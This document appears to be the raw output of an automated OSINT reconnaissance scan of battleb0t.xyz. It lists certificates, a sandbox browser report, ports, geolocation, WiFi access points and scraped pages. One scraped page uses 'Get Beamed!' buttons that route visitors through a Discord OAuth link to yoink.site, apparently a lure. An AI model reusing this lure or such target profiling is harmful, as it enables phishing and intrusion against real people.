keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:oldfluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
95:2c:18:1f:d0:91:73:33:88:ab:4e:68:d6:e3:58:9c:45:64:
b3:8a:0d:c0:05:28:dd:e1:2b:f4:06:90:e5:1f:5e:3c:9c:82:
f8:42:f9:9c:fc:f0:39:70:2a:ec:b3:e8:e8:27:a3:e2:22:80:
9f:b5:25:f6:b8:88:47:5f:86:6d:fa:80:87:2b:27:3e:0f:10:
6e:32:3f:e2:3c:74:e0:3c:4f:db:80:e5:a0:7b:df:70:24:e5:
0b:57:3d:66:c3:68:d9:cb:10:13:bf:3d:4b:9b:bd:e4:38:dc:
16:3b:ab:a4:bb:05:4c:21:58:ec:56:01:d3:cd:f7:e4:52:ad:
1c:0c:0e:45:9d:25:b3:ee:43:f3:93:10:64:3c:d1:8d:ef:4c:
a1:a0:46:a0:9c:7a:71:16:74:1d:79:35:f7:b7:75:a9:5d:1a:
70:92:2b:c8:d4:0a:a7:04:cf:3a:2e:08:b5:53:9c:fd:91:52:
6d:bc:96:2f:53:07:7f:1a:15:71:f1:e4:9c:95:b8:03:cb:17:
25:b8:bd:2e:3d:91:c6:72:cb:50:7f:bb:42:cd:87:4e:3f:af:
01:27:cd:29:c4:cc:43:33:bb:f8:a1:ac:9f:c7:0b:d7:f6:39:
18:d3:6f:bb:a0:79:75:5a:d1:c9:35:44:91:1c:7a:a8:9d:4d:
fb:9f:95:2e
|
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:5E:6E:39) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:52:30 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 24, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://portal.succeedms.com/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\SM0:6912:304:WilStaging_02"\n "SM0:6912:120:WilError_01"\n "Local\\SM0:6912:120:WilError_01"\n "SM0:6912:304:WilStaging_02"\n "InternetShortcutMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"205.209.56.185:443"\n "138.91.254.96:443"\n "69.16.175.42:443"\n "142.250.189.234:443"\n "185.199.108.153:443"\n "205.234.175.175:443"\n "104.17.25.14:443"\n "151.101.65.195:443"\n "104.18.11.207:443"\n "142.250.189.195:443"\n "20.99.186.246:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ajax.googleapis.com"\n "angular-ui.github.io"\n "api.edgeoffer.microsoft.com"\n "arc.msn.com"\n "cdn.ckeditor.com"\n "cdnjs.cloudflare.com"\n "code.angularjs.org"\n "code.jquery.com"\n "fonts.googleapis.com"\n 
"fonts.gstatic.com"\n "maxcdn.bootstrapcdn.com"\n "portal.succeedms.com"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\crashpad\\throttle_store.dat"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\crashpad\\settings.dat"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\local state"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\variations"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\crashpad\\settings.dat"\n "msedge.exe" writes file "\\device\\namedpipe\\wkssvc"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\variations"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\last version"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\vpn tokens-journal"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 
0, u'type': 8, u'description': u'"urlref_httpsportal.succeedms.com" has type "HTML document ASCII text with CRLF line terminators"- [targetUID: N/A]\n "shopping.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\6260_60775041\\shopping.js]- [targetUID: 00000000-00006260]\n "data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00006260]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\6260_60775041\\edge_driver.js]- [targetUID: 00000000-00006260]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_1]- [targetUID: 00000000-00006260]\n "edge_confirmation_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\6260_60775041\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00006260]\n "product_page.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\6260_60775041\\product_page.js]- [targetUID: 00000000-00006260]\n "edge_checkout_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\6260_60775041\\edge_checkout_page_validator.js]- [targetUID: 00000000-00006260]\n "auto_open_controller.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\6260_60775041\\auto_open_controller.js]- [targetUID: 00000000-00006260]\n "000009.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgeCoupons\\coupons_data.db\\000009.log]- [targetUID: 00000000-00006260]\n "000013.ldb" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgeCoupons\\coupons_data.db\\000013.ldb]- [targetUID: 00000000-00006260]\n "load_statistics.db-wal" has type 
"SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00006260]\n "e2c201dc-abb6-4501-b956-b4b9ffeb3b35.tmp" has type "gzip compressed data from FAT filesystem (MS-DOS OS/2 NT) original size modulo 2^32 96705"- Location: [%TEMP%\\e2c201dc-abb6-4501-b956-b4b9ffeb3b35.tmp]- [targetUID: 00000000-00006260]\n "load_statistics.db" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db]- [targetUID: 00000000-00006260]\n "shoppingfre.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\6260_60775041\\shoppingfre.js]- [targetUID: 00000000-00006260]\n "000014.ldb" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgeCoupons\\coupons_data.db\\000014.ldb]- [targetUID: 00000000-00006260]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\GPUCache\\data_1]- [targetUID: 00000000-00006260]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\DawnCache\\data_1]- [targetUID: 00000000-00006260]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\GrShaderCache\\data_1]- [targetUID: 00000000-00006260]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ShaderCache\\data_1]- [targetUID: 00000000-00006260]\n "edge_autofill_field_data.json" has type "JSON data"- Location: [%TEMP%\\6260_1023497038\\edge_autofill_field_data.json]- [targetUID: 00000000-00006260]\n "History" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\History]- [targetUID: 00000000-00006912]\n "f_0004c8" has type "gzip compressed data from Unix original size modulo 2^32 485056"- Location: 
[%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_0004c8]- [targetUID: 00000000-00004156]\n "Web Data" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Web Data]- [targetUID: 00000000-00006260]\n "Visited Links" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Visited Links]- [targetUID: 00000000-00006260]\n "safety_tips.pb" has type "data"- Location: [%TEMP%\\6260_470104041\\safety_tips.pb]- [targetUID: 00000000-00006260]\n "data_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_0]- [targetUID: 00000000-00006260]\n "sslkey.txt" has type "data"- Location: [%TEMP%\\sslkey.txt]- [targetUID: 00000000-00006260]\n "Tabs_13327794733834989" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sessions\\Tabs_13327794733834989]- [targetUID: 00000000-00006260]\n "deny_domains.list" has type "data"- Location: [%TEMP%\\6260_159770579\\deny_domains.list]- [targetUID: 00000000-00006260]\n "4d0843e6-a90a-4206-b16a-5bf96317da49.tmp" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Ad Blocking\\4d0843e6-a90a-4206-b16a-5bf96317da49.tmp]- [targetUID: 00000000-00006260]\n "f_0004c6" has type "gzip compressed data from Unix original size modulo 2^32 282766"- [targetUID: N/A]\n "Diagnostic Data-wal" has type "SQLite Write-Ahead Log version 3007000"- [targetUID: N/A]\n "85ebca81-6b72-4b70-9587-353468916cff.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\85ebca81-6b72-4b70-9587-353468916cff.tmp]- [targetUID: 00000000-00006260]\n "1f491eff-7d04-4310-ba68-455db03d3064.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\1f491eff-7d04-4310-ba68-455db03d3064.tmp]- 
[targetUID: 00000000-00006260]\n "63072495-c7f1-4fa2-8e13-281e75a5446c.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\63072495-c7f1-4fa2-8e13-281e75a5446c.tmp]- [targetUID: 00000000-00006260]\n "3ca9b7b0-520b-4866-a772-da63c52ee9e3.tmp" has type "UTF-8 Unicode text with very long lines | 185.199.108.153 |
| 2023-05-12 03:32:27 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.14:8443 | 188.114.97.0/24 |
| 2023-05-12 02:46:16 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Commons-based peer production - Commons-based peer production is a term coined by Harvard Law School professor Yochai Benkler. It describes a model of socio-economic production in which large numbers of people work cooperatively; usually over the Internet. | battleb0t.github.io |
| 2023-05-12 03:08:55 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.74.170.78 | 34.74.170.74 |
| 2023-05-12 02:44:05 | SSL Certificate - Issued by | No | CertSpotter | 0 | 0 | 1 | 0 | None | C=US,O=Let's Encrypt,CN=R3 | battleb0t.xyz |
| 2023-05-12 02:56:27 | Hash | No | Hash Extractor | 0 | 0 | 3 | 0 | None | [MD5] 02ca825e4901e74c2c2d6f8e59341325 | <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<link rel="iron" href="https://cdn.discordapp.com/avatars/710143953533403226/02ca825e4901e74c2c2d6f8e59341325.png?size=512" sizes="512x512" type="image/png" />
<meta property="og:title" content="SkyHelper API - Documentation" />
<meta property="og:image" content="https://cdn.discordapp.com/avatars/710143953533403226/02ca825e4901e74c2c2d6f8e59341325.png?size=512" />
<meta property="oh.theme-color" content="#3585d0" />
<meta property="og:description" content="A hypixel skyblock API wrapper containing most features that the SkyHelper bot has to offer." />
<title>SkyHelper API - Documentation</title>
<link rel="stylesheet" href="https://stackedit.io/style.css" />
</head>
<body class="stackedit">
<div class="stackedit__html">
<h1 id="skyhelper-api">SkyHelper API</h1>
<h1 id="authentication">Authentication</h1>
<p>
The SkyHelper API uses their own API keys to authenticate requests. You can either host this API on your own server and define keys on there or subscribe to the SkyHelper
<a href="https://www.patreon.com/skyhelper">Patreon</a> (Silver or Gold Supporter) to get an API key from me.<br />
You can either use the key query parameter by adding a
<code>?key=token</code> to the end of API requests or using an authorization header by adding a <code>Authorization</code> header to your API requests, where the value of the header is your API
token.
</p>
<h1 id="responses">Responses</h1>
<p>
All endpoints in the API return all their responses in JSON, all requests will return a <code>status</code> key which should match the response status code that was returned and a
<code>data</code> key for successful responses. A <code>reason</code> key will be returned for failed requests.
</p>
<table>
<thead>
<tr>
<th>Status Code</th>
<th>Reason</th>
</tr>
</thead>
<tbody>
<tr>
<td>200</td>
<td>Successful request</td>
</tr>
<tr>
<td>400</td>
<td>
The request is missing an authentication method (valid
<code>key</code> query parameter or an <code>Authentication</code> header)
</td>
</tr>
<tr>
<td>403</td>
<td>The provided token does not exist</td>
</tr>
<tr>
<td>404</td>
<td>There is no player with the given UUID or name or the player has no SkyBlock profiles</td>
</tr>
<tr>
<td>429</td>
<td>
The Hypixel API rate-limit was reached (The API will return
<code>RateLimit-Remaining</code> and <code>RateLimit-Reset</code> headers)
</td>
</tr>
<tr>
<td>500</td>
<td>
There was an error in the SkyHelper API or the Hypixel API returned an unknown error code. Please report these errors back on
<a href="https://github.com/Altpapier/SkyHelperAPI/issues">GitHub</a>
</td>
</tr>
<tr>
<td>502</td>
<td>Hypixels API is experiencing some technical issues or is unavailable</td>
</tr>
<tr>
<td>503</td>
<td>Hypixels API is in maintenance mode</td>
</tr>
<tr>
<td>504</td>
<td>Hypixels API returned a <code>Gateway Time-out</code> error</td>
</tr>
</tbody>
</table>
<h1 id="endpoints">Endpoints</h1>
<h3 id="get-v2networth"><code>POST</code> /v2/networth</h3>
<table>
<thead>
<tr>
<th>Field</th>
<th>Type</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>profileData</td>
<td>Object</td>
<td>The profile player data from the Hypixel API (profile.members[uuid])</td>
</tr>
<tr>
<td>bankBalance</td>
<td>Number</td>
<td>The player's bank balance from the Hypixel API (profile.banking?.balance)</td>
</tr>
<tr>
<td>onlyNetworth</td>
<td>Boolean</td>
<td>(default: false) If true, only the networth will be returned</td>
</tr>
</tbody>
</table>
<h3 id="post-v2networthitem"><code>POST</code>/v2/networth/item</h3>
<table>
<thead>
<tr>
<th>Field</th>
<th>Type</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>itemData</td>
<td>Object</td>
<td>The parsed item data of an item from the profiles endpoint</td>
</tr>
</tbody>
</table>
<h3 id="get-v2profilesuser"><code>GET</code> /v2/profiles/:user</h3>
<h3 id="get-v2profileuserprofile"><code>GET</code> /v2/profile/:user/:profile</h3>
<h3 id="get-v1profilesuser"><code>GET</code> /v1/profiles/:user</h3>
<h3 id="get-v1profileuserprofile"><code>GET</code> /v1/profile/:user/:profile</h3>
<h3 id="get-v1profilesuseritems"><code>GET</code> /v1/items/:user</h3>
<h3 id="get-v1profileuserprofileitems"><code>GET</code> /v1/items/:user/:profile</h3>
<h3 id="get-v1fetchur"><code>GET</code> /v1/fetchur</h3>
<table>
<thead>
<tr>
<th>Parameter</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>user</td>
<td>This can be the UUID of a user or the name</td>
</tr>
<tr>
<td>profile</td>
<td>This can be the users profile id or name</td>
</tr>
</tbody>
</table>
<h1 id="networthcalculationtypes">Networth Calculation Types</h1>
<p>Types that are used to describe an item's calculation</p>
<table>
<thead>
<tr>
<th>Type</th>
</tr>
</thead>
<tbody>
<tr>
<td>essence</td>
</tr>
<tr>
<td>prestige</td>
</tr>
<tr>
<td>shens_auction</td>
</tr>
<tr>
<td>winning_bid</td>
</tr>
<tr>
<td>enchant</td>
</tr>
<tr>
<td>silex</td>
</tr>
<tr>
<td>wood_singularity</td>
</tr>
<tr>
<td>tuned_transmission</td>
</tr>
<tr>
<td>thunder_charge</td>
</tr>
<tr>
<td>rune</td>
</tr>
<tr>
<td>fuming_potato_book</td>
</tr>
<tr>
<td>hot_potato_book</td>
</tr>
<tr>
<td>dye</td>
</tr>
<tr>
<td>the_art_of_war</td>
</tr>
<tr>
<td>the_art_of_peace</td>
</tr>
<tr>
<td>farming_for_dummies</td>
</tr>
<tr>
<td>recombobulator_3000</td>
</tr>
<tr>
<td>gemstone</td>
</tr>
<tr>
<td>reforge</td>
</tr>
<tr>
<td>master_star</td>
</tr>
<tr>
<td>necron_scroll</td>
</tr>
<tr>
<td>gemstone_chamber</td>
</tr>
<tr>
<td>drill_part</td>
</tr>
<tr>
<td>etherwarp_conduit</td>
</tr>
<tr>
<td>pet_item</td>
</tr>
|
| 2023-05-12 02:55:27 | BGP AS Membership | No | URLScan.io | 0 | 0 | 1 | 0 | None | 13335 | ayhu.xyz |
| 2023-05-12 03:18:06 | Externally Hosted Javascript | No | Page Information | 0 | 0 | 3 | 0 | None | https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js | <!DOCTYPE html>
<html>
<head>
<title>Funny Forehead Gallery</title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<script src="http://code.jquery.com/jquery-3.2.1.js" integrity="sha256-DZAnKJ/6XZ9si04Hgrsxu/8s717jcIzLy3oi35EouyE=" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<script src="https://use.fontawesome.com/9dfc16ed6b.js"></script>
<link rel="stylesheet" type="text/css" href="gallery.css">
<link rel="icon" type="image/png" href="/images/favicon.png">
</head>
<body>
<nav class = "nav navbar-inverse navbar-fixed-top">
<div class = "container">
<div class = "navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a href = "#" class = "navbar-brand"><span class="glyphicon glyphicon-picture" aria-hidden="true"></span> #WieselOnTop</a>
</div>
</nav>
<div class = "container">
<div class = "jumbotron">
<h1><i class="fa fa-camera-retro" aria-hidden="true"></i> The Funny Forehead Gallery</h1>
<p>A bunch of beautiful images!</p>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Join the Discord</a>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Get Beamed!</a>
</div>
<div class = "row">
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_3.JPG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nomnom.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/fredo.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jonas.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_1.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_3.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/reveloder.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_2.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_4.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_5.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_1.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_2.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_4.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_5.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_6.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jcqn.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nwp.PNG">
</div>
</div>
</div>
</body>
</html>
|
| 2023-05-12 03:01:00 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.100): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:45:30 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 3 | 0 | None | {u'region_code': u'SC', u'country_tld': u'.us', u'ip': u'35.229.48.116', u'currency_name': u'Dollar', u'currency': u'USD', u'country_population': 327167434, u'country_code': u'US', u'timezone': u'America/New_York', u'city': u'North Charleston', u'network': u'35.229.32.0/19', u'languages': u'en-US,es-US,haw,fr', u'version': u'IPv4', u'latitude': 32.853, u'in_eu': False, u'utc_offset': u'-0400', u'continent_code': u'NA', u'country_name': u'United States', u'country_capital': u'Washington', u'org': u'GOOGLE-CLOUD-PLATFORM', u'postal': u'29405', u'asn': u'AS396982', u'country': u'US', u'region': u'South Carolina', u'longitude': -79.9876, u'country_calling_code': u'+1', u'country_area': 9629091.0, u'country_code_iso3': u'USA'} | 35.229.48.116 |
| 2023-05-12 02:54:00 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} | 104.21.6.166 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | CIEE (Net ID: 00:01:71:0A:18:17) | 52.3759, 4.8975 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | PeopleMatter (Net ID: 00:18:0A:31:ED:0A) | 32.8608, -79.9746 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Apple Network 1f64fd (Net ID: 00:02:2D:1F:64:FD) | 37.7642, -122.3993 |
| 2023-05-12 03:04:14 | Malicious Affiliate | Yes | abuse.ch | 0 | 1 | 3 | 0 | None | abuse.ch URLhaus (Domain) [cdn-185-199-109-153.github.com]
https://urlhaus.abuse.ch/downloads/csv_recent/ | cdn-185-199-109-153.github.com |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | xfinitywifi (Net ID: 00:0D:67:8C:21:B2) | 39.0469, -77.4903 |
| 2023-05-12 02:45:06 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:89:fe:30:65:f6:62:86:64:4f:34:07:5e:a0:a9:be:d2:24
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 13 15:55:50 2022 GMT
Not After : Mar 13 15:55:49 2023 GMT
Subject: CN=vscode.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
C4:B4:9F:3E:13:AF:1E:ED:5D:1E:C0:B3:15:A8:37:84:5F:58:79:25
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:vscode.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
| battleb0t.xyz |
| 2023-05-12 03:36:20 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.128:8443 | 188.114.97.0/24 |
| 2023-05-12 03:24:47 | Country | No | Country Name Extractor | 0 | 0 | 3 | 0 | None | Canada | Toronto, Ontario, ON, Canada, CA |
| 2023-05-12 02:49:07 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:74:c7:69:09:be:bf:85:53:83:95:0e:84:5e:23:6b:8f:95
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 27 17:04:53 2023 GMT
Not After : Jun 25 17:04:52 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
